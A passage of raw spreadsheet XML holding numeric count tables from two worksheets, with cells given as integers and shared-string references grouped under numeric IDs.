      <c r="K1594" s="7">
        <v>5943</v>
      </c>
      <c r="L1594" s="8">
        <v>32</v>
      </c>
      <c r="M1594" s="8">
        <v>1</v>
      </c>
      <c r="N1594" s="8">
        <v>20</v>
      </c>
      <c r="O1594" s="8">
        <v>519</v>
      </c>
      <c r="P1594" s="8">
        <v>19</v>
      </c>
      <c r="Q1594" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="1595" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1595" s="7">
        <v>5946</v>
      </c>
      <c r="B1595" s="8">
        <v>22</v>
      </c>
      <c r="C1595" s="8">
        <v>0</v>
      </c>
      <c r="D1595" s="8">
        <v>5</v>
      </c>
      <c r="E1595" s="8">
        <v>0</v>
      </c>
      <c r="F1595" s="8">
        <v>7</v>
      </c>
      <c r="G1595" s="8">
        <v>4</v>
      </c>
      <c r="H1595" s="8">
        <v>38</v>
      </c>
      <c r="K1595" s="7">
        <v>5946</v>
      </c>
      <c r="L1595" s="8">
        <v>22</v>
      </c>
      <c r="M1595" s="8">
        <v>0</v>
      </c>
      <c r="N1595" s="8">
        <v>5</v>
      </c>
      <c r="O1595" s="8">
        <v>0</v>
      </c>
      <c r="P1595" s="8">
        <v>7</v>
      </c>
      <c r="Q1595" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1596" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1596" s="7">
        <v>5950</v>
      </c>
      <c r="B1596" s="8">
        <v>25</v>
      </c>
      <c r="C1596" s="8">
        <v>1</v>
      </c>
      <c r="D1596" s="8">
        <v>2</v>
      </c>
      <c r="E1596" s="8">
        <v>2</v>
      </c>
      <c r="F1596" s="8">
        <v>4</v>
      </c>
      <c r="G1596" s="8">
        <v>4</v>
      </c>
      <c r="H1596" s="8">
        <v>38</v>
      </c>
      <c r="K1596" s="7">
        <v>5950</v>
      </c>
      <c r="L1596" s="8">
        <v>25</v>
      </c>
      <c r="M1596" s="8">
        <v>1</v>
      </c>
      <c r="N1596" s="8">
        <v>2</v>
      </c>
      <c r="O1596" s="8">
        <v>2</v>
      </c>
      <c r="P1596" s="8">
        <v>4</v>
      </c>
      <c r="Q1596" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1597" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1597" s="7">
        <v>6136</v>
      </c>
      <c r="B1597" s="8">
        <v>25</v>
      </c>
      <c r="C1597" s="8">
        <v>1</v>
      </c>
      <c r="D1597" s="8">
        <v>11</v>
      </c>
      <c r="E1597" s="8">
        <v>0</v>
      </c>
      <c r="F1597" s="8">
        <v>2</v>
      </c>
      <c r="G1597" s="8">
        <v>6</v>
      </c>
      <c r="H1597" s="8">
        <v>45</v>
      </c>
      <c r="K1597" s="7">
        <v>6136</v>
      </c>
      <c r="L1597" s="8">
        <v>25</v>
      </c>
      <c r="M1597" s="8">
        <v>1</v>
      </c>
      <c r="N1597" s="8">
        <v>11</v>
      </c>
      <c r="O1597" s="8">
        <v>0</v>
      </c>
      <c r="P1597" s="8">
        <v>2</v>
      </c>
      <c r="Q1597" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1598" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1598" s="7">
        <v>6137</v>
      </c>
      <c r="B1598" s="8">
        <v>25</v>
      </c>
      <c r="C1598" s="8">
        <v>1</v>
      </c>
      <c r="D1598" s="8">
        <v>17</v>
      </c>
      <c r="E1598" s="8">
        <v>0</v>
      </c>
      <c r="F1598" s="8">
        <v>3</v>
      </c>
      <c r="G1598" s="8">
        <v>2</v>
      </c>
      <c r="H1598" s="8">
        <v>48</v>
      </c>
      <c r="K1598" s="7">
        <v>6137</v>
      </c>
      <c r="L1598" s="8">
        <v>25</v>
      </c>
      <c r="M1598" s="8">
        <v>1</v>
      </c>
      <c r="N1598" s="8">
        <v>17</v>
      </c>
      <c r="O1598" s="8">
        <v>0</v>
      </c>
      <c r="P1598" s="8">
        <v>3</v>
      </c>
      <c r="Q1598" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1599" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1599" s="7">
        <v>6146</v>
      </c>
      <c r="B1599" s="8">
        <v>4</v>
      </c>
      <c r="C1599" s="8">
        <v>0</v>
      </c>
      <c r="D1599" s="8">
        <v>0</v>
      </c>
      <c r="E1599" s="8">
        <v>0</v>
      </c>
      <c r="F1599" s="8">
        <v>0</v>
      </c>
      <c r="G1599" s="8">
        <v>6</v>
      </c>
      <c r="H1599" s="8">
        <v>10</v>
      </c>
      <c r="K1599" s="7">
        <v>6146</v>
      </c>
      <c r="L1599" s="8">
        <v>4</v>
      </c>
      <c r="M1599" s="8">
        <v>0</v>
      </c>
      <c r="N1599" s="8">
        <v>0</v>
      </c>
      <c r="O1599" s="8">
        <v>0</v>
      </c>
      <c r="P1599" s="8">
        <v>0</v>
      </c>
      <c r="Q1599" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1600" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1600" s="7">
        <v>6153</v>
      </c>
      <c r="B1600" s="8">
        <v>22</v>
      </c>
      <c r="C1600" s="8">
        <v>0</v>
      </c>
      <c r="D1600" s="8">
        <v>5</v>
      </c>
      <c r="E1600" s="8">
        <v>0</v>
      </c>
      <c r="F1600" s="8">
        <v>6</v>
      </c>
      <c r="G1600" s="8">
        <v>1</v>
      </c>
      <c r="H1600" s="8">
        <v>34</v>
      </c>
      <c r="K1600" s="7">
        <v>6153</v>
      </c>
      <c r="L1600" s="8">
        <v>22</v>
      </c>
      <c r="M1600" s="8">
        <v>0</v>
      </c>
      <c r="N1600" s="8">
        <v>5</v>
      </c>
      <c r="O1600" s="8">
        <v>0</v>
      </c>
      <c r="P1600" s="8">
        <v>6</v>
      </c>
      <c r="Q1600" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1601" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1601" s="7">
        <v>6154</v>
      </c>
      <c r="B1601" s="8">
        <v>22</v>
      </c>
      <c r="C1601" s="8">
        <v>0</v>
      </c>
      <c r="D1601" s="8">
        <v>3</v>
      </c>
      <c r="E1601" s="8">
        <v>0</v>
      </c>
      <c r="F1601" s="8">
        <v>5</v>
      </c>
      <c r="G1601" s="8">
        <v>1</v>
      </c>
      <c r="H1601" s="8">
        <v>31</v>
      </c>
      <c r="K1601" s="7">
        <v>6154</v>
      </c>
      <c r="L1601" s="8">
        <v>22</v>
      </c>
      <c r="M1601" s="8">
        <v>0</v>
      </c>
      <c r="N1601" s="8">
        <v>3</v>
      </c>
      <c r="O1601" s="8">
        <v>0</v>
      </c>
      <c r="P1601" s="8">
        <v>5</v>
      </c>
      <c r="Q1601" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1602" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1602" s="7" t="s">
        <v>16226</v>
      </c>
      <c r="B1602" s="8">
        <v>35197</v>
      </c>
      <c r="C1602" s="8">
        <v>1882</v>
      </c>
      <c r="D1602" s="8">
        <v>28481</v>
      </c>
      <c r="E1602" s="8">
        <v>55532</v>
      </c>
      <c r="F1602" s="8">
        <v>26663</v>
      </c>
      <c r="G1602" s="8">
        <v>24357</v>
      </c>
      <c r="H1602" s="8">
        <v>172112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40631-DCC7-BA47-89D9-EA236D1A890C}">
  <dimension ref="A1:D23249"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B28" sqref="B28"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="19.83203125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="17" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="5.1640625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="6.1640625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A1" t="s">
        <v>8</v>
      </c>
      <c r="B1" t="s">
        <v>16209</v>
      </c>
      <c r="C1" t="s">
        <v>16210</v>
      </c>
      <c r="D1" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="2" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2" t="s">
        <v>16228</v>
      </c>
      <c r="B2" t="s">
        <v>16211</v>
      </c>
      <c r="C2">
        <v>0</v>
      </c>
      <c r="D2">
        <v>2341</v>
      </c>
    </row>
    <row r="3" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3" t="s">
        <v>16231</v>
      </c>
      <c r="B3" t="s">
        <v>16212</v>
      </c>
      <c r="C3">
        <v>0</v>
      </c>
      <c r="D3">
        <v>2341</v>
      </c>
    </row>
    <row r="4" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4" t="s">
        <v>16228</v>
      </c>
      <c r="B4" t="s">
        <v>16213</v>
      </c>
      <c r="C4">
        <v>0</v>
      </c>
      <c r="D4">
        <v>2341</v>
      </c>
    </row>
    <row r="5" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5" t="s">
        <v>16231</v>
      </c>
      <c r="B5" t="s">
        <v>16214</v>
      </c>
      <c r="C5">
        <v>0</v>
      </c>
      <c r="D5">
        <v>2341</v>
      </c>
    </row>
    <row r="6" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6" t="s">
        <v>16228</v>
      </c>
      <c r="B6" t="s">
        <v>16215</v>
      </c>
      <c r="C6">
        <v>1</v>
      </c>
      <c r="D6">
        <v>2341</v>
      </c>
    </row>
    <row r="7" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7" t="s">
        <v>16231</v>
      </c>
      <c r="B7" t="s">
        <v>16216</v>
      </c>
      <c r="C7">
        <v>0</v>
      </c>
      <c r="D7">
        <v>2341</v>
      </c>
    </row>
    <row r="8" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8" t="s">
        <v>16228</v>
      </c>
      <c r="B8" t="s">
        <v>16217</v>
      </c>
      <c r="C8">
        <v>2</v>
      </c>
      <c r="D8">
        <v>2341</v>
      </c>
    </row>
    <row r="9" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9" t="s">
        <v>16231</v>
      </c>
      <c r="B9" t="s">
        <v>16218</v>
      </c>
      <c r="C9">
        <v>0</v>
      </c>
      <c r="D9">
        <v>2341</v>
      </c>
    </row>
    <row r="10" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10" t="s">
        <v>16229</v>
      </c>
      <c r="B10" t="s">
        <v>16219</v>
      </c>
      <c r="C10">
        <v>0</v>
      </c>
      <c r="D10">
        <v>2341</v>
      </c>
    </row>
    <row r="11" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11" t="s">
        <v>16230</v>
      </c>
      <c r="B11" t="s">
        <v>16220</v>
      </c>
      <c r="C11">
        <v>0</v>
      </c>
      <c r="D11">
        <v>2341</v>
      </c>
    </row>
    <row r="12" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12" t="s">
        <v>16229</v>
      </c>
      <c r="B12" t="s">
        <v>16221</v>
      </c>
      <c r="C12">
        <v>4</v>
      </c>
      <c r="D12">
        <v>2341</v>
      </c>
    </row>
    <row r="13" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13" t="s">
        <v>16230</v>
      </c>
      <c r="B13" t="s">
        <v>16222</v>
      </c>
      <c r="C13">
        <v>10</v>
      </c>
      <c r="D13">
        <v>2341</v>
      </c>
    </row>
    <row r="14" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14" t="s">
        <v>16223</v>
      </c>
      <c r="B14" t="s">
        <v>16223</v>
      </c>
      <c r="C14">
        <v>26</v>
      </c>
      <c r="D14">
        <v>2341</v>
      </c>
    </row>
    <row r="15" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15" t="s">
        <v>16224</v>
      </c>
      <c r="B15" t="s">
        <v>16224</v>
      </c>
      <c r="C15">
        <v>0</v>
      </c>
      <c r="D15">
        <v>2341</v>
      </c>
    </row>
    <row r="16" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A16" t="s">
        <v>16228</v>
      </c>
      <c r="B16" t="s">
        <v>16211</v>
      </c>
      <c r="C16">
        <v>0</v>
      </c>
      <c r="D16">
        <v>683</v>
      </c>
    </row>
    <row r="17" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17" t="s">
        <v>16231</v>
      </c>
      <c r="B17" t="s">
        <v>16212</v>
      </c>
      <c r="C17">
        <v>0</v>
      </c>
      <c r="D17">
        <v>683</v>
      </c>
    </row>
    <row r="18" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18" t="s">
        <v>16228</v>
      </c>
      <c r="B18" t="s">
        <v>16213</v>
      </c>
      <c r="C18">
        <v>0</v>
      </c>
      <c r="D18">
        <v>683</v>
      </c>
    </row>
    <row r="19" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19" t="s">
        <v>16231</v>
      </c>
      <c r="B19" t="s">
        <v>16214</v>
      </c>
      <c r="C19">
        <v>0</v>
      </c>
      <c r="D19">
        <v>683</v>
      </c>
    </row>
    <row r="20" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20" t="s">
        <v>16228</v>
      </c>
      <c r="B20" t="s">
        <v>16215</v>
      </c>
      <c r="C20">
        <v>8</v>
      </c>
      <c r="D20">
        <v>683</v>
      </c>
    </row>
    <row r="21" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21" t="s">
        <v>16231</v>
      </c>
      <c r="B21" t="s">
        <v>16216</v>
      </c>
      <c r="C21">
        <v>3</v>
      </c>
      <c r="D21">
        <v>683</v>
      </c>
    </row>
    <row r="22" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22" t="s">
        <v>16228</v>
      </c>
      <c r="B22" t="s">
        <v>16217</v>
      </c>
      <c r="C22">
        <v>4</v>
      </c>
      <c r="D22">
        <v>683</v>
      </c>
    </row>
    <row r="23" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23" t="s">
        <v>16231</v>
      </c>
      <c r="B23" t="s">
        <v>16218</v>
      </c>
      <c r="C23">
        <v>0</v>
      </c>
      <c r="D23">
        <v>683</v>
      </c>
    </row>
    <row r="24" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A24" t="s">
        <v>16229</v>
      </c>
      <c r="B24" t="s">
        <v>16219</v>
      </c>
      <c r="C24">
        <v>6</v>
      </c>
      <c r="D24">
        <v>683</v>
      </c>
    </row>
    <row r="25" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A25" t="s">
        <v>16230</v>
      </c>
      <c r="B25" t="s">
        <v>16220</v>
      </c>
      <c r="C25">
        <v>0</v>
      </c>
      <c r="D25">
        <v>683</v>
      </c>
    </row>
    <row r="26" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A26" t="s">
        <v>16229</v>
      </c>
      <c r="B26" t="s">
        <v>16221</v>
      </c>
      <c r="C26">
        <v>4</v>
      </c>
      <c r="D26">
        <v>683</v>
      </c>
    </row>
    <row r="27" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A27" t="s">
        <v>16230</v>
      </c>
      <c r="B27" t="s">
        <v>16222</v>
      </c>
      <c r="C27">
        <v>3</v>
      </c>
      <c r="D27">
        <v>683</v>
      </c>
    </row>
    <row r="28" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A28" t="s">
        <v>16223</v>
      </c>
      <c r="B28" t="s">
        <v>16223</v>
      </c>
      <c r="C28">
        <v>30</v>
      </c>
      <c r="D28">
        <v>683</v>
      </c>
    </row>
    <row r="29" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A29" t="s">
        <v>16224</v>
      </c>
      <c r="B29" t="s">
        <v>16224</v>
      </c>
      <c r="C29">
        <v>2</v>
      </c>
      <c r="D29">
        <v>683</v>
      </c>
    </row>
    <row r="30" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A30" t="s">
        <v>16228</v>
      </c>
      <c r="B30" t="s">
        <v>16211</v>
      </c>
      <c r="C30">
        <v>0</v>
      </c>
      <c r="D30">
        <v>2277</v>
      </c>
    </row>
    <row r="31" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A31" t="s">
        <v>16231</v>
      </c>
      <c r="B31" t="s">
        <v>16212</v>
      </c>
      <c r="C31">
        <v>0</v>
      </c>
      <c r="D31">
        <v>2277</v>
      </c>
    </row>
    <row r="32" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A32" t="s">
        <v>16228</v>
      </c>
      <c r="B32" t="s">
        <v>16213</v>
      </c>
      <c r="C32">
        <v>0</v>
      </c>
      <c r="D32">
        <v>2277</v>
      </c>
    </row>
    <row r="33" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A33" t="s">
        <v>16231</v>
      </c>
      <c r="B33" t="s">
        <v>16214</v>
      </c>
      <c r="C33">
        <v>0</v>
      </c>
      <c r="D33">
        <v>2277</v>
      </c>
    </row>
    <row r="34" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A34" t="s">
        <v>16228</v>
      </c>
      <c r="B34" t="s">
        <v>16215</v>
      </c>
      <c r="C34">
        <v>2</v>
      </c>
      <c r="D34">
        <v>2277</v>
      </c>
    </row>
    <row r="35" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A35" t="s">
        <v>16231</v>
      </c>
      <c r="B35" t="s">
        <v>16216</v>
      </c>
      <c r="C35">
        <v>2</v>
      </c>
      <c r="D35">
        <v>2277</v>
      </c>
    </row>
    <row r="36" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A36" t="s">
        <v>16228</v>
      </c>
      <c r="B36" t="s">
        <v>16217</v>
      </c>
      <c r="C36">
        <v>6</v>
      </c>
      <c r="D36">
        <v>2277</v>
      </c>
    </row>
    <row r="37" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A37" t="s">
        <v>16231</v>
      </c>
      <c r="B37" t="s">
        <v>16218</v>
      </c>
      <c r="C37">
        <v>2</v>
      </c>
      <c r="D37">
        <v>2277</v>
      </c>
    </row>
    <row r="38" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A38" t="s">
        <v>16229</v>
      </c>
      <c r="B38" t="s">
        <v>16219</v>
      </c>
      <c r="C38">
        <v>0</v>
      </c>
      <c r="D38">
        <v>2277</v>
      </c>
    </row>
    <row r="39" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A39" t="s">
        <v>16230</v>
      </c>
      <c r="B39" t="s">
        <v>16220</v>
      </c>
      <c r="C39">
        <v>0</v>
      </c>
      <c r="D39">
        <v>2277</v>
      </c>
    </row>
    <row r="40" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A40" t="s">
        <v>16229</v>
      </c>
      <c r="B40" t="s">
        <v>16221</v>
      </c>
      <c r="C40">
        <v>5</v>
      </c>
      <c r="D40">
        <v>2277</v>
      </c>
    </row>
    <row r="41" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A41" t="s">
        <v>16230</v>
      </c>
      <c r="B41" t="s">
        <v>16222</v>
      </c>
      <c r="C41">
        <v>4</v>
      </c>
      <c r="D41">
        <v>2277</v>
      </c>
    </row>
    <row r="42" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A42" t="s">
        <v>16223</v>
      </c>
      <c r="B42" t="s">
        <v>16223</v>
      </c>
      <c r="C42">
        <v>25</v>
      </c>
      <c r="D42">
        <v>2277</v>
      </c>
    </row>
    <row r="43" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A43" t="s">
        <v>16224</v>
      </c>
      <c r="B43" t="s">
        <v>16224</v>
      </c>
      <c r="C43">
        <v>0</v>
      </c>
      <c r="D43">
        <v>2277</v>
      </c>
    </row>
    <row r="44" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A44" t="s">
        <v>16228</v>
      </c>
      <c r="B44" t="s">
        <v>16211</v>
      </c>
      <c r="C44">
        <v>0</v>
      </c>
      <c r="D44">
        <v>1324</v>
      </c>
    </row>
    <row r="45" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A45" t="s">
        <v>16231</v>
      </c>
      <c r="B45" t="s">
        <v>16212</v>
      </c>
      <c r="C45">
        <v>0</v>
      </c>
      <c r="D45">
        <v>1324</v>
      </c>
    </row>
    <row r="46" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A46" t="s">
        <v>16228</v>
      </c>
      <c r="B46" t="s">
        <v>16213</v>
      </c>
      <c r="C46">
        <v>1</v>
      </c>
      <c r="D46">
        <v>1324</v>
      </c>
    </row>
    <row r="47" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A47" t="s">
        <v>16231</v>
      </c>
      <c r="B47" t="s">
        <v>16214</v>
      </c>
      <c r="C47">
        <v>2</v>
      </c>
      <c r="D47">
        <v>1324</v>
      </c>
    </row>
    <row r="48" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A48" t="s">
        <v>16228</v>
      </c>
      <c r="B48" t="s">
        <v>16215</v>
      </c>
      <c r="C48">
        <v>1</v>
      </c>
      <c r="D48">
        <v>1324</v>
      </c>
    </row>
    <row r="49" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A49" t="s">
        <v>16231</v>
      </c>
      <c r="B49" t="s">
        <v>16216</v>
      </c>
      <c r="C49">
        <v>2</v>
      </c>
      <c r="D49">
        <v>1324</v>
      </c>
    </row>
    <row r="50" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A50" t="s">
        <v>16228</v>
      </c>
      <c r="B50" t="s">
        <v>16217</v>
      </c>
      <c r="C50">
        <v>2</v>
      </c>
      <c r="D50">
        <v>1324</v>
      </c>
    </row>
    <row r="51" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A51" t="s">
        <v>16231</v>
      </c>
      <c r="B51" t="s">
        <v>16218</v>
      </c>
      <c r="C51">
        <v>8</v>
      </c>
      <c r="D51">
        <v>1324</v>
      </c>
    </row>
    <row r="52" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A52" t="s">
        <v>16229</v>
      </c>
      <c r="B52" t="s">
        <v>16219</v>
      </c>
      <c r="C52">
        <v>0</v>
      </c>
      <c r="D52">
        <v>1324</v>
      </c>
    </row>
    <row r="53" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A53" t="s">
        <v>16230</v>
      </c>
      <c r="B53" t="s">
        <v>16220</v>
      </c>
      <c r="C53">
        <v>0</v>
      </c>
      <c r="D53">
        <v>1324</v>
      </c>
    </row>
    <row r="54" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A54" t="s">
        <v>16229</v>
      </c>
      <c r="B54" t="s">
        <v>16221</v>
      </c>
      <c r="C54">
        <v>0</v>
      </c>
      <c r="D54">
        <v>1324</v>
      </c>
    </row>
    <row r="55" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A55" t="s">
        <v>16230</v>
      </c>
      <c r="B55" t="s">
        <v>16222</v>
      </c>
      <c r="C55">
        <v>0</v>
      </c>
      <c r="D55">
        <v>1324</v>
      </c>
    </row>
    <row r="56" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A56" t="s">
        <v>16223</v>
      </c>
      <c r="B56" t="s">
        <v>16223</v>
      </c>
      <c r="C56">
        <v>0</v>
      </c>
      <c r="D56">
        <v>1324</v>
      </c>
    </row>
    <row r="57" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A57" t="s">
        <v>16224</v>
      </c>
      <c r="B57" t="s">
        <v>16224</v>
      </c>
      <c r="C57">
        <v>0</v>
      </c>
      <c r="D57">
        <v>1324</v>
      </c>
    </row>
    <row r="58" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A58" t="s">
        <v>16228</v>
      </c>
      <c r="B58" t="s">
        <v>16211</v>
      </c>
      <c r="C58">
        <v>0</v>
      </c>
      <c r="D58">
        <v>1499</v>
      </c>
    </row>
    <row r="59" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A59" t="s">
        <v>16231</v>
      </c>
      <c r="B59" t="s">
        <v>16212</v>
      </c>
      <c r="C59">
        <v>0</v>
      </c>
      <c r="D59">
        <v>1499</v>
      </c>
    </row>
    <row r="60" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A60" t="s">
        <v>16228</v>
      </c>
      <c r="B60" t="s">
        <v>16213</v>
      </c>
      <c r="C60">
        <v>0</v>
      </c>
      <c r="D60">
        <v>1499</v>
      </c>
    </row>
    <row r="61" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A61" t="s">
        <v>16231</v>
      </c>
      <c r="B61" t="s">
        <v>16214</v>
      </c>
      <c r="C61">
        <v>0</v>
      </c>
      <c r="D61">
        <v>1499</v>
      </c>
    </row>
    <row r="62" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A62" t="s">
        <v>16228</v>
      </c>
      <c r="B62" t="s">
        <v>16215</v>
      </c>
      <c r="C62">
        <v>2</v>
      </c>
      <c r="D62">
        <v>1499</v>
      </c>
    </row>
    <row r="63" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A63" t="s">
        <v>16231</v>
      </c>
      <c r="B63" t="s">
        <v>16216</v>
      </c>
      <c r="C63">
        <v>4</v>
      </c>
      <c r="D63">
        <v>1499</v>
      </c>
    </row>
    <row r="64" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A64" t="s">
        <v>16228</v>
      </c>
      <c r="B64" t="s">
        <v>16217</v>
      </c>
      <c r="C64">
        <v>3</v>
      </c>
      <c r="D64">
        <v>1499</v>
      </c>
    </row>
    <row r="65" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A65" t="s">
        <v>16231</v>
      </c>
      <c r="B65" t="s">
        <v>16218</v>
      </c>
      <c r="C65">
        <v>0</v>
      </c>
      <c r="D65">
        <v>1499</v>
      </c>
    </row>
    <row r="66" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A66" t="s">
        <v>16229</v>
      </c>
      <c r="B66" t="s">
        <v>16219</v>
      </c>
      <c r="C66">
        <v>0</v>
      </c>
      <c r="D66">
        <v>1499</v>
      </c>
    </row>
    <row r="67" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A67" t="s">
        <v>16230</v>
      </c>
      <c r="B67" t="s">
        <v>16220</v>
      </c>
      <c r="C67">
        <v>0</v>
      </c>
      <c r="D67">
        <v>1499</v>
      </c>
    </row>
    <row r="68" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A68" t="s">
        <v>16229</v>
      </c>
      <c r="B68" t="s">
        <v>16221</v>
      </c>
      <c r="C68">
        <v>42</v>
      </c>
      <c r="D68">
        <v>1499</v>
      </c>
    </row>
    <row r="69" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A69" t="s">
        <v>16230</v>
      </c>
      <c r="B69" t="s">
        <v>16222</v>
      </c>
      <c r="C69">
        <v>52</v>
      </c>
      <c r="D69">
        <v>1499</v>
      </c>
    </row>
    <row r="70" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A70" t="s">
        <v>16223</v>
      </c>
      <c r="B70" t="s">
        <v>16223</v>
      </c>
      <c r="C70">
        <v>26</v>
      </c>
      <c r="D70">
        <v>1499</v>
      </c>
    </row>
    <row r="71" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A71" t="s">
        <v>16224</v>
      </c>
      <c r="B71" t="s">
        <v>16224</v>
      </c>
      <c r="C71">
        <v>1</v>
      </c>
      <c r="D71">
        <v>1499</v>
      </c>
    </row>
    <row r="72" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A72" t="s">
        <v>16228</v>
      </c>
      <c r="B72" t="s">
        <v>16211</v>
      </c>
      <c r="C72">
        <v>0</v>
      </c>
      <c r="D72">
        <v>1310</v>
      </c>
    </row>
    <row r="73" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A73" t="s">
        <v>16231</v>
      </c>
      <c r="B73" t="s">
        <v>16212</v>
      </c>
      <c r="C73">
        <v>0</v>
      </c>
      <c r="D73">
        <v>1310</v>
      </c>
    </row>
    <row r="74" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A74" t="s">
        <v>16228</v>
      </c>
      <c r="B74" t="s">
        <v>16213</v>
      </c>
      <c r="C74">
        <v>0</v>
      </c>
      <c r="D74">
        <v>1310</v>
      </c>
    </row>
    <row r="75" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A75" t="s">
        <v>16231</v>
      </c>
      <c r="B75" t="s">
        <v>16214</v>
      </c>
      <c r="C75">
        <v>0</v>
      </c>
      <c r="D75">
        <v>1310</v>
      </c>
    </row>
    <row r="76" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A76" t="s">
        <v>16228</v>
      </c>
      <c r="B76" t="s">
        <v>16215</v>
      </c>
      <c r="C76">
        <v>10</v>
      </c>
      <c r="D76">
        <v>1310</v>
      </c>
    </row>
    <row r="77" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A77" t="s">
        <v>16231</v>
      </c>
      <c r="B77" t="s">
        <v>16216</v>
      </c>
      <c r="C77">
        <v>2</v>
      </c>
      <c r="D77">
        <v>1310</v>
      </c>
    </row>
    <row r="78" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A78" t="s">
        <v>16228</v>
      </c>
      <c r="B78" t="s">
        <v>16217</v>
      </c>
      <c r="C78">
        <v>2</v>
      </c>
      <c r="D78">
        <v>1310</v>
      </c>
    </row>
    <row r="79" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A79" t="s">
        <v>16231</v>
      </c>
      <c r="B79" t="s">
        <v>16218</v>
      </c>
      <c r="C79">
        <v>5</v>
      </c>
      <c r="D79">
        <v>1310</v>
      </c>
    </row>
    <row r="80" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A80" t="s">
        <v>16229</v>
      </c>
      <c r="B80" t="s">
        <v>16219</v>
      </c>
      <c r="C80">
        <v>0</v>
      </c>
